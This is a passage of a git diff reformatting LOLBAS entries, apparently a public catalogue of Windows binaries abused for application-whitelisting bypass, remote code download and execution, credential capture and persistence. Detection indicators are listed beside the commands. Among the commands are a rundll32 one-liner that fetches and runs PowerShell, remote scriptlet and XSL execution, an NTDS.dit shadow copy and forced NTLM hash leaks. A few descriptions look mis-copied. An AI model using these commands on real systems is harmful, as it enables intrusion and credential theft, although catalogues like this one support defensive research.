https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll Description: Execute the specified local .SCT script with scrobj.dll. + Usecase: Execute code from scriptlet, bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1117 + MitreLink: https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + Description: Execute the specified remote .SCT script with scrobj.dll. + Usecase: Execute code from remote scriptlet, bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1117 + MitreLink: https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll + Description: Execute the specified local .SCT script with scrobj.dll. + Usecase: Execute code from scriptlet, bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1117 + MitreLink: https://attack.mitre.org/wiki/Technique/T1117 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\regsvr32.exe - - C:\Windows\SysWOW64\regsvr32.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\regsvr32.exe + - Path: C:\Windows\SysWOW64\regsvr32.exe +Code Sample: +- Code: +Detection: + - IOC: regsvr32.exe getting files from Internet + - IOC: regsvr32.exe executing scriptlet files Resources: - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1117/T1117.md +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Replace.yml b/yml/OSBinaries/Replace.yml index dd00da6..6294b2d 100644 --- a/yml/OSBinaries/Replace.yml +++ b/yml/OSBinaries/Replace.yml @@ -1,21 +1,36 @@ --- Name: Replace.exe -Description: Copy, Download -Author: '' +Description: Used to replace file with another file +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: replace.exe C:\Source\File.cab C:\Destination /A - Description: Copy the specified file to the destination folder. + Description: Copy file.cab to destination + Usecase: Copy files + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A - Description: Copy the specified file to the destination folder. + Description: Download/Copy bar.exe to outdir + Usecase: Download file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\replace.exe - - C:\Windows\SysWOW64\replace.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\replace.exe + - Path: C:\Windows\SysWOW64\replace.exe +Code Sample: +- Code: +Detection: + - IOC: Replace.exe getting files from remote server Resources: - - https://twitter.com/elceef/status/986334113941655553 - - https://twitter.com/elceef/status/986842299861782529 -Notes: Thanks to elceef - @elceef - + - Link: https://twitter.com/elceef/status/986334113941655553 + - Link: https://twitter.com/elceef/status/986842299861782529 +Acknowledgement: + - Person: elceef + Handle: '@elceef' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml index 8ac1eab..f5871a3 100644 --- a/yml/OSBinaries/Rpcping.yml +++ b/yml/OSBinaries/Rpcping.yml @@ -1,25 +1,31 @@ --- Name: Rpcping.exe -Description: Credentials -Author: '' +Description: Used to verify rpc connection +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: rpcping -s 127.0.0.1 -t ncacn_np - Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. - - Command: rpcping -s 192.168.1.10 -ncacn_np - Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. + Usecase: Capture credentials on a non-standard port + Category: Credentials + Privileges: User + MitreID: T1003 + MitreLink: https://attack.mitre.org/wiki/Technique/T1003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\rpcping.exe - - C:\Windows\SysWOW64\rpcping.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\rpcping.exe + - Path: C:\Windows\SysWOW64\rpcping.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/subtee/status/872797890539913216 - - https://github.com/vysec/RedTips - - https://twitter.com/vysecurity/status/974806438316072960 - - https://twitter.com/vysecurity/status/873181705024266241 -Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity - + - Link: https://github.com/vysec/RedTips + - Link: https://twitter.com/vysecurity/status/974806438316072960 + - Link: https://twitter.com/vysecurity/status/873181705024266241 +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' + - Person: Vincent Yiu + Handle: '@vysecurity' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index 494b4bb..46f3b6f 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -1,32 +1,70 @@ --- Name: Rundll32.exe -Description: Execute, Read ADS -Author: '' +Description: Used by Windows to execute dll files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: rundll32.exe AllTheThingsx64,EntryPoint - Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. + Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. + Usecase: Execute dll file + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. + Usecase: Execute code from Internet + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. + Usecase: Execute code from Internet + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). + Usecase: Execute code from alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\rundll32.exe - - C:\Windows\SysWOW64\rundll32.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\rundll32.exe + - Path: C:\Windows\SysWOW64\rundll32.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ - - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ + - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Runonce.yml b/yml/OSBinaries/Runonce.yml index 9d32bb5..30c39ec 100644 --- a/yml/OSBinaries/Runonce.yml +++ b/yml/OSBinaries/Runonce.yml @@ -1,20 +1,28 @@ --- Name: Runonce.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Runonce.exe /AlternateShellStartup - Description: Executes a Run Once Task that has been configured in the registry. + Description: Executes a Run Once Task that has been configured in the registry + Usecase: Persistence, bypassing defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\runonce.exe - - c:\windows\sysWOW64\runonce.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\runonce.exe + - Path: C:\Windows\SysWOW64\runonce.exe +Code Sample: +- Code: +Detection: + - IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY Resources: - - https://twitter.com/pabraeken/status/990717080805789697 - - https://cmatskas.com/configure-a-runonce-task-on-windows/ -Notes: | - Thanks to Pierre-Alexandre Braeken - @pabraeken - Requires Administrative access. + - Link: https://twitter.com/pabraeken/status/990717080805789697 + - Link: https://cmatskas.com/configure-a-runonce-task-on-windows/ +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Runscripthelper.yml b/yml/OSBinaries/Runscripthelper.yml index 5c25cc7..8d7f4dd 100644 --- a/yml/OSBinaries/Runscripthelper.yml +++ b/yml/OSBinaries/Runscripthelper.yml @@ -1,17 +1,28 @@ --- Name: Runscripthelper.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test - Description: Execute the PowerShell script named test.txt. + Description: Execute the PowerShell script named test.txt + Usecase: Bypass constrained language mode and execute Powershell script + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe ' - - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe + - Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe +Code Sample: +- Code: +Detection: + - IOC: Event 4014 - Powershell logging + - IOC: Event 400 Resources: - - https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc -Notes: Thanks to Matt Graeber - @mattifestation + - Link: https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index d2277f3..3778572 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -1,19 +1,27 @@ --- -Name: SC.exe -Description: Execute, Read ADS, Create Service, Start Service -Author: '' +Name: Sc.exe +Description: Used by Windows to manage services +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: | - sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto - sc start evilservice - Description: '' + - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice + Description: Creates a new service and executes the file stored in the ADS. + Usecase: Execute binary file hidden inside an alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\sc.exe - - C:\Windows\SysWOW64\sc.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\sc.exe + - Path: C:\Windows\SysWOW64\sc.exe +Code Sample: +- Code: +Detection: + - IOC: Services that gets created Resources: - - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ -Notes: Thanks to Oddvar Moe - @oddvarmoe + - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index ea21da1..98f9a95 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,21 +1,37 @@ --- Name: Scriptrunner.exe -Description: Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Scriptrunner.exe -appvscript calc.exe - Description: Execute calc.exe. + Description: Executes calc.exe + Usecase: Execute binary through proxy binary to evade defensive counter measurments + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Description: Execute the calc.cmd script on the remote share. + Description: Executes calc.cmde from remote server + Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\scriptrunner.exe - - c:\windows\sysWOW64\scriptrunner.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\scriptrunner.exe + - Path: C:\Windows\SysWOW64\scriptrunner.exe +Code Sample: +- Code: +Detection: + - IOC: Scriptrunner.exe should not be in use unless App-v is deployed Resources: - - https://twitter.com/KyleHanslovan/status/914800377580503040 - - https://twitter.com/NickTyrer/status/914234924655312896 - - https://github.com/MoooKitty/Code-Execution -Notes: Thanks to Nick Tyrer - @NickTyrer + - Link: https://twitter.com/KyleHanslovan/status/914800377580503040 + - Link: https://twitter.com/NickTyrer/status/914234924655312896 + - Link: https://github.com/MoooKitty/Code-Execution +Acknowledgement: + - Person: Nick Tyrer + Handle: '@nicktyrer' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index a284590..7450aef 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -1,16 +1,27 @@ --- Name: SyncAppvPublishingServer.exe -Description: Execute -Author: '' +Description: Used by App-v to get App-v server lists +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Description: Example command on how inject Powershell code into the process + Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\SyncAppvPublishingServer.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\SyncAppvPublishingServer.exe + - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe +Code Sample: +- Code: +Detection: + - IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed Resources: - - https://twitter.com/monoxgas/status/895045566090010624 -Notes: Thanks to Nick Landers - @monoxgas + - Link: https://twitter.com/monoxgas/status/895045566090010624 +Acknowledgement: + - Person: Nick Landers + Handle: '@monoxgas' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index dba8f83..f53d2ae 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -1,20 +1,28 @@ ---- + --- Name: Wab.exe -Description: Execute -Author: '' +Description: Windows address book manager +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Wab.exe - Description: Loads a DLL configured in the registry under HKLM. + - Command: wab.exe + Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice + Usecase: Execute dll file. Bypass defensive counter measures + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Program Files\Windows Mail\wab.exe ' - - 'C:\Program Files (x86)\Windows Mail\wab.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Program Files\Windows Mail\wab.exe + - Path: C:\Program Files (x86)\Windows Mail\wab.exe +Code Sample: +- Code: +Detection: + - IOC: WAB.exe should normally never be used Resources: - - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ - - https://twitter.com/Hexacorn/status/991447379864932352 -Notes: | - Thanks to Adam - @Hexacorn - Requires registry changes, Requires Administrative Access + - Link: https://twitter.com/Hexacorn/status/991447379864932352 + - Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ +Acknowledgement: + - Person: Adam + Handle: '@Hexacorn' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index d49bfc1..50e2d3c 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -1,46 +1,85 @@ --- -Name: WMIC.exe -Description: Reconnaissance, Execute, Read ADS -Author: '' +Name: Wmic.exe +Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: wmic.exe process call create calc - Description: Execute calc.exe. - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS). - - Command: wmic.exe useraccount get /ALL - Description: List the user accounts on the machine. - - Command: wmic.exe process get caption,executablepath,commandline - Description: Gets the command line used to execute a running program. - - Command: wmic.exe qfe get description,installedOn /format:csv - Description: Gets a list of installed Windows updates. - - Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") - Description: Check to see if the target system is running SQL. - - Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" - Description: Use the PowerShell cmdlet to list the shares on a remote server. - - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: wmic.exe process call create calc + Description: Execute calc from wmic + Usecase: Execute binary from wmic to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. + Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" Description: Execute evil.exe on the remote system. + Usecase: Execute binary on a remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. + Usecase: Execute binary with scheduled task created with wmic on a remote computer + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" Description: Create a volume shadow copy of NTDS.dit that can be copied. - - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" - Description: Execute a script contained in the target .XSL file hosted on a remote server. - - Command: wmic.exe os get /format:"MYXSLFILE.xsl" - Description: Executes JScript or VBScript embedded in the target XSL stylesheet. + Usecase: Execute binary on remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" + Description: Create a volume shadow copy of NTDS.dit that can be copied. + Usecase: Execute binary on remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. - + Usecase: Execute script from remote system + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\wbem\wmic.exe - - c:\windows\sysWOW64\wbem\wmic.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\wmic.exe + - Path: C:\Windows\SysWOW64\wmic.exe +Code Sample: +- Code: +Detection: + - IOC: Wmic getting scripts from remote system Resources: - - https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory - - https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html - - https://twitter.com/subTee/status/986234811944648707 -Notes: Thanks to Casey Smith - @subtee + - Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory + - Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html + - Link: https://twitter.com/subTee/status/986234811944648707 +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 989c166..144d221 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -1,17 +1,27 @@ --- Name: Wscript.exe -Description: Execute, Read ADS -Author: '' +Description: Used by Windows to execute scripts +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: wscript c:\ads\file.txt:script.vbs - Description: Executes the .VBS script stored as an Alternate Data Stream (ADS). + Description: Execute script stored in an alternate data stream + Usecase: Execute hidden code to evade defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\wscript.exe - - c:\windows\sysWOW64\wscript.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\wscript.exe + - Path: C:\Windows\SysWOW64\wscript.exe +Code Sample: +- Code: +Detection: + - IOC: Wscript.exe executing code from alternate data streams Resources: - - '?' -Notes: Thanks to ? + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index b5f5d0d..216e397 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,21 +1,29 @@ --- Name: Xwizard.exe -Description: DLL hijack, Execute -Author: '' +Description: +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: xwizard.exe - Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} Description: Xwizard.exe running a custom class that has been added to the registry. + Usecase: Run a com object created in registry to evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\xwizard.exe - - c:\windows\sysWOW32\xwizard.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\xwizard.exe + - Path: C:\Windows\SysWOW64\xwizard.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ - - https://www.youtube.com/watch?v=LwDHX7DVHWU - - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 -Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer + - Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ + - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU + - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 +Acknowledgement: + - Person: Adam + Handle: '@Hexacorn' +--- \ No newline at end of file